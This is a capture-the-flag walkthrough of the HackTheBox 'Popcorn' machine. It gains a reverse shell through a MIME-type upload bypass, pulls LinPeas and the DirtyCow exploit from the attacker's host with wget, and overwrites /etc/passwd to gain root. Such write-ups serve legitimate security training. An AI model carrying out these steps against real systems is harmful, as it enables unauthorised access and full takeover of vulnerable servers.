Popcorn is a HackTheBox medium machine that emphasises the importance of enumeration. This machine involves exploiting the image upload MIME-type bypass in a torrent-hosting web application to gain an initial foothold. Privilege escalation involves exploiting a legacy Linux kernel exploit famously known as DirtyCow.
1. Initial Enumeration and Service Discovery
As the first step, I ran an NMAP scan on the target machine to get a better idea of the target machine. I used nmap -sC -sV -O popcorn.htb -oN nmap_scan to scan the open ports and services.
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-20 07:16 -0400 Nmap scan report for popcorn.htb (10.129.3.212) Host is up (0.56s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA) |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA) 80/tcp open http Apache httpd 2.2.12 |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.2.12 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=8/20%OT=22%CT=1%CU=42356%PV=Y%DS=2%DC=I%G=Y%TM=6A86E26 OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=C5%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=8)SEQ(S OS:P=C8%GCD=1%ISR=CA%TI=Z%CI=Z%II=I%TS=8)SEQ(SP=C9%GCD=1%ISR=CD%TI=Z%CI=Z%I OS:I=I%TS=8)SEQ(SP=CA%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%TS=8)SEQ(SP=CF%GCD=1%ISR= OS:CE%TI=Z%CI=Z%II=I%TS=8)OPS(O1=M542ST11NW6%O2=M542ST11NW6%O3=M542NNT11NW6 OS:%O4=M542ST11NW6%O5=M542ST11NW6%O6=M542ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W OS:4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M542NNSNW6%CC=Y%Q=)T1( OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164% OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds
Based on the scan results, the target machine has only two ports open: Port 22 and Port 80.
By visiting port 80 using a web browser, I discovered that the website only had the default page and no version numbers or any other information visible.
1.1 Web Directory Enumeration (Port 80)
Since there is no usable information on the default page, I decided to run a GoBuster directory scan to see if there are any hidden directories.
=============================================================== Gobuster v3.8.2 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://popcorn.htb [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8.2 [+] Extensions: html,php,md,txt [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== index (Status: 200) [Size: 177] index.html (Status: 200) [Size: 177] test (Status: 200) [Size: 47371] test.php (Status: 200) [Size: 47399] torrent (Status: 301) [Size: 312] [--> http://popcorn.htb/torrent/] rename (Status: 301) [Size: 311] [--> http://popcorn.htb/rename/]
Based on the scan results, I discovered that the /test endpoint has the complete phpinfo() diagnostic output. It discloses that the target is running PHP Version 5.2.10 on an outdated Linux kernel (2.6.31-14-generic-pae).
/rename endpoint exposes documentation for the Renamer API.
Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
/torrent endpoint hosts a web application named "Torrent Hoster".
2. Initial Access - Torrent Hoster Upload Bypass
Torrent Hoster web application includes user login and registration functionalities. I decided to register as a new user and log in to the application.
After logging in, I immediately downloaded a PHP reverse shell script from pentestmonkey and tried to upload it using the torrent upload form.
But this form did not allow me to upload any PHP files, image files, or text files with the .torrent extension.
Since this did not work, I wanted to check if the form works for a legitimate torrent file. So I downloaded a torrent file from Ubuntu Releases Page and uploaded it, and the form successfully uploaded the file and redirected me to the file details page.
2.1 MIME-Type Bypass via Screenshot Upload
Submitting a legitimate .torrent file succeeds, redirecting to the file details page where users can manage torrent information and upload screenshot images.
I tried uploading the PHP reverse shell using the screenshot uploader section, but it also failed because the form was validating the image files and only allowing image files.
So, I decided to use Burp Suite to intercept the request and change the MIME type of the file from application/x-php to image/png.
This worked, and the PHP reverse shell script was uploaded successfully.
2.2 Initial Foothold
The uploaded screenshot is now visible in the torrent edit page with the text "Image File Not Found!". Next, I set up a Netcat listener and clicked on the text to trigger the reverse shell script.
And, I was able to get a reverse shell connection as www-data.
listening on [any] 4444 ... connect to [10.10.16.36] from (UNKNOWN) [10.129.3.212] 51975 Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux 15:40:30 up 1:21, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: can't access tty; job control turned off $ whoami www-data
3. Local Enumeration & User Flag
After establishing the initial access as www-data, I decided to enumerate the target machine for users and to find the user flag.
The machine had only one user, george, and surprisingly, www-data was able to access george's home directory and read the user flag.
www-data@popcorn:/$ cd home www-data@popcorn:/home$ ls george www-data@popcorn:/home$ cd george/ www-data@popcorn:/home/george$ ls torrenthoster.zip user.txt www-data@popcorn:/home/george$ cat user.txt
4. Privilege Escalation & Root Flag
I downloaded LinPeas to the target machine to enumerate and find a way to escalate privileges. (wget http://10.10.16.36:8000/linpeas.sh)
LinPeas flagged a list of highly vulnerable kernel exploits.
I tried some of the exploits listed, and some resulted in complete machine freezes, so I had to reset the machine two times and do everything all over again.
Eventually I tried DirtyCow kernel exploit to escalate privileges as root.
Once I downloaded the exploit to the target machine, I compiled the exploit using gcc -pthread 40839.c -o 40839 -lcrypt on the target machine itself because my local compiler was throwing errors at the old exploit code.
www-data@popcorn:/tmp$ wget http://10.10.16.36:8000/40839.c --2026-08-20 16:53:37-- http://10.10.16.36:8000/40839.c Connecting to 10.10.16.36:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 5006 (4.9K) [text/x-csrc] Saving to: `40839.c' 100%[======================================>] 5,006 --.-K/s in 0.006s 2026-08-20 16:53:39 (790 KB/s) - `40839.c' saved [5006/5006] www-data@popcorn:/tmp$ gcc -pthread 40839.c -o 40839 -lcrypt
This exploit overwrites the root account with a generated line, and after running the exploit, I will be able to log in as the new user firefart with root privileges.
www-data@popcorn:/tmp$ ./40839 /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash mmap: b7790000 ^C www-data@popcorn:/tmp$ su firefart Password: firefart@popcorn:/tmp# whoami firefart firefart@popcorn:/tmp# sudo -l sudo: unknown user: root firefart@popcorn:/tmp# cd /root firefart@popcorn:~# ls root.txt firefart@popcorn:~# cat root.txt
Congrats! We found both flags!
HTB Machine Completion